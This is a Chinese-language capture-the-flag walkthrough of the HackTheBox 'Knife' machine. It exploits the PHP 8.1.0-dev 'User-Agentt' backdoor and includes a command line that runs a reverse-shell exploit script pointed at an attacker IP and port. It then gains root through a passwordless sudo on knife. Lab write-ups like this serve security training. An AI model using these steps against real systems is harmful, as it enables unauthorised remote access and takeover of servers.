Linux/Knife

Knife

Enumeration

nmap

第一次扫描发现系统对外开放了22和80端口,端口详细信息如下

系统对外开放了2个端口,22的ssh和80的http,先访问web看看

单看该服务,并没有发现有趣的东西,wappalyzer显示php版本为8.1.0

PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution

搜索发现该版本php存在后门漏洞,可以远程执行代码

首先将该漏洞利用脚本下载到工作目录,我这里用了github的脚本

然后执行python脚本,输入url,本机ip,设置监听端口,在本地开启监听,然后执行python脚本

复制代码
usage: revshell_php_8.1.0-dev.py [-h] <target URL> <attacker IP> <attacker PORT> python revshell_php_8.1.0-dev.py http://10.10.10.242 10.10.14.3 4444

在python执行界面中没有反应,但是监听端获取到shell

Privilege Escalation

直接使用sudo -l发现可以使用root权限执行knife程序,且不需要密码

在gtfobins中发现knife可以利用,如图

执行指令即可获取root权限

相关推荐
pound12730 分钟前
Linux
linux·运维·服务器
@CLoudbays_Martin1134 分钟前
为什么动态视频业务内容不可以被CDN静态缓存?
java·运维·服务器·javascript·网络·python·php
learning_tom2 小时前
HTML图片标签及路径详解
linux·服务器·php
Suckerbin3 小时前
DarkHole: 2靶场渗透
笔记·安全·web安全·网络安全
dbdr09013 小时前
Linux 入门到精通,真的不用背命令!零基础小白靠「场景化学习法」,3 个月拿下运维 offer,第二十六天
linux·运维·服务器·网络·python·学习
大白的编程日记.3 小时前
【Linux学习笔记】信号的深入理解之软件条件产生信号
linux·笔记·学习
buyutang_3 小时前
C/C++ Linux系统编程:线程控制详解,从线程创建到线程终止
linux·c语言·c++·学习
云的牧人4 小时前
Ubuntu 22 redis集群搭建
linux·运维·ubuntu
siriuuus4 小时前
Linux 磁盘扩容及分区相关操作实践
linux·运维·服务器
To_再飞行4 小时前
K8s 存储配置资源
linux·云原生·容器·kubernetes